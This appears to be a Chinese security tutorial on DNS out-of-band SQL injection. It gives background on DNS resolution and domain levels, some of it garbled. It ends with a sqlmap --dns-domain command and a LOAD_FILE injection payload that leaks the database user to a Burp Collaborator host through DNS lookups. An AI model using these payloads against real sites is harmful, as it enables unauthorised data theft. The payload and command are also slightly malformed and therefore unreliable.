0x00前言
时间盲注和布尔都需要一个个的通过ascii码来进行一位位的拆解 而且尝试次数太多也有可能被网站ban掉
0x01原理
我们输入域名之后 我们的本地域名服务器会把在自身服务器里面查询是否存在ip地址 如果没有则发送到根域名服务器 如果根域名服务器里面有对应的记录则返回 如果没有则告诉本地域名服务器去向顶级域名服务器查找
dns在解析的时候会留下记录 然后我们来读取这个多级域名的解析日记来获取到我们所想要的内容
扩展:
顶级域名
国家域名可分为不同级别,包括顶级域名、二级域名,三级域名等。
顶级域名又分为两类:
一是国家顶级域名(national top-level domainnames,简称nTLDs),有200多个国家都按照ISO3166国家代码分配了顶级域名,例如中国是cn,美国是us,日本是jp等;
二是国际顶级域名(international top-level domain names,简称iTDs),例如表示工商企业的 .com .top,表示网络提供商的.net,表示非盈利组织的.org等。大多数域名争议都发生在com的顶级域名下,因为多数公司上网的目的都是为了赢利。为加强域名管理,解决域名资源的紧张,Internet协会、Internet分址机构及世界知识产权组织(WIPO)等国际组织经过广泛协商, 在原来三个国际通用顶级域名:(com)的基础上,新增加了7个国际通用顶级域名:firm(公司企业)、store(销售公司或企业)、web(突出WWW活动的单位)、arts(突出文化、娱乐活动的单位)、rec (突出消遣、娱乐活动的单位)、info (提供信息服务的单位)、nom(个人),并在世界范围内选择新的注册机构来受理域名注册申请。
二级域名
二级域名是指顶级域名之下的域名,在国际顶级域名下,它是指域名注册人的网上名称,例如 ibm,yahoo,microsoft等;在国家顶级域名下,它是表示注册企业类别的符号,例如com,top,edu,gov,net等。
我国在国际互联网络信息中心(Inter NIC) 正式注册并运行的顶级域名是CN,这也是我国的一级域名。在顶级域名之下,我国的二级域名又分为类别域名和行政区域名两类。类别域名共6个, 包括用于科研机构的ac;用于工商金融企业的com top;用于教育机构的edu;用于政府部门的 gov;用于互联网络信息中心和运行中心的net;用于非盈利组织的org。而行政区域名有34个,分别对应于我国各省、自治区和直辖市。
三级域名
三级域名用字母( A~Z,a~z,大小写等)、数字(0~9)和连接符(-)组成, 各级域名之间用实点(.)连接,三级域名的长度不能超过20个字符。 如无特殊原因,建议采用申请人的英文名(或者缩写)或者汉语拼音名 (或者缩写) 作为三级域名,以保持域名的清晰性和简洁性。
0x02实现操作
准备的东西,sqlmap、windows盲注,2个域名,一台外网服务器
简单的sqlmap的sql-shell测试DNS注入
brupsuite 利用 找到一个Brup上 copy获取域名
sqlmap命令 : sqmap -r post.txt —random-agent —batch —dns-domain=b.com —hex —dbs
SELECT LOAD_FILE(CONCAT(‘\\‘,(SELECT hex(user())),’.rwrdl8id44whjg72lr61vz00wr2jq8.burpcollaborator.net\foobar’))),1,1)%23